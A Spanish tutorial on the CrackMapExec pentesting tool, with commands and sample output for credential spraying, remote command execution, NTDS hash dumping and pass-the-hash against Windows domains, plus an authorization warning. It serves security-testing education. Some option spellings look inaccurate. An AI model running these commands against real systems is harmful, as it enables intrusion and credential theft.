CrackMapExec

🖥️ CrackMapExec (CME): Swiss Army Knife para Redes Windows

CrackMapExec es una herramienta de pentesting diseñada para evaluar y explotar redes Active Directory. Su principal objetivo es automatizar tareas como la enumeración de usuarios, validación de credenciales y ejecución remota de comandos en sistemas Windows.


🕵️‍♂️ ¿Qué puede hacer CME?

  1. 🔐 Validación de Credenciales: Probar credenciales en múltiples sistemas.

  2. 🧑‍💻 Enumeración de Usuarios: Identificar usuarios en un dominio.

  3. 🖥️ Ejecución Remota de Comandos: Ejecutar comandos en hosts remotos.

  4. 📂 Acceso a Recursos Compartidos: Listar y extraer archivos compartidos en SMB.

  5. 📜 Extracción de Hashes: Obtener hashes NTLM para posteriores ataques.


🚀 Instalación

Para instalar CrackMapExec:

  1. Usar pipx (recomendado):

    pipx install crackmapexec
    
  2. Desde código fuente:

    git clone <https://github.com/Porchetta-Industries/CrackMapExec>
    cd CrackMapExec
    pip install .
    

📌 Ejemplos Prácticos con Código

1️⃣ Enumerar Recursos SMB

Lista los recursos compartidos en un host.

cme smb 192.168.1.10

Salida esperada:

SMB         192.168.1.10  445  DC01         [*] Windows Server 2019 Standard 1809
SMB         192.168.1.10  445  DC01         [+] Enumerated shares
SMB         192.168.1.10  445  DC01         SHARE: SharedDocs
SMB         192.168.1.10  445  DC01         IPC$: Remote IPC

2️⃣ Probar Credenciales

Verifica si un conjunto de credenciales es válido.

cme smb 192.168.1.0/24 -u admin -p password123

Explicación:

  • 192.168.1.0/24: Escanea toda la subred.

  • u: Usuario.

  • p: Contraseña.

Salida esperada:

SMB         192.168.1.10  445  DC01         [+] admin:password123 (Valid Credentials)

3️⃣ Obtener Usuarios y Grupos 🧑‍💻

Enumera usuarios y grupos del dominio.

cme smb 192.168.1.10 -u admin -p password123 --users

Salida esperada:

SMB         192.168.1.10  445  DC01         [*] Enumerated Users
SMB         192.168.1.10  445  DC01         Administrator
SMB         192.168.1.10  445  DC01         Guest
SMB         192.168.1.10  445  DC01         User1

4️⃣ Ejecución Remota de Comandos 💻

Ejecuta comandos en un sistema remoto.

cme smb 192.168.1.10 -u admin -p password123 -x "ipconfig"

Salida esperada:

SMB         192.168.1.10  445  DC01         [+] Executed command
SMB         192.168.1.10  445  DC01         [Command Output] Windows IP Configuration...

5️⃣ Dump de Hashes NTLM 🔐

Extrae hashes NTLM de un sistema Windows.

cme smb 192.168.1.10 -u admin -p password123 --ntds

Salida esperada:

SMB         192.168.1.10  445  DC01         [+] Dumping NTDS
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::

6️⃣ Ataques Pass-the-Hash

Utiliza hashes NTLM en lugar de contraseñas.

cme smb 192.168.1.10 -u admin -H 8846f7eaee8fb117ad06bdd830b7586c

Explicación:

  • H: Especifica un hash NTLM en lugar de una contraseña.


⚙️ Opciones Útiles

  • Ejecutar scripts personalizados: Usa -exec-method <method> para cambiar la técnica de ejecución.

  • Modo silencioso: Filtra salidas para reducir ruido con -quiet.

  • Guardar resultados: Exporta a un archivo:

    cme smb 192.168.1.10 -u admin -p password123 -o output.txt
    

🌟 Mejores Prácticas

  1. Combinación con herramientas: Usa CME junto con herramientas como BloodHound para un análisis profundo de Active Directory.

  2. Pruebas éticas: Asegúrate de tener permiso para realizar estas auditorías.

  3. Protocolo seguro: Usa siempre SMB v2 o v3 para evitar vulnerabilidades en SMB v1.


🚨 Advertencia

El uso de CrackMapExec en sistemas sin autorización puede tener consecuencias legales graves. Úsalo exclusivamente para auditorías con permiso.


🤓 Conclusión

CrackMapExec es una herramienta increíblemente versátil que agiliza el trabajo de pentesters en redes basadas en Windows. Su capacidad para manejar múltiples tareas en una sola herramienta la convierte en imprescindible. 🔐

Última actualización

¿Te fue útil?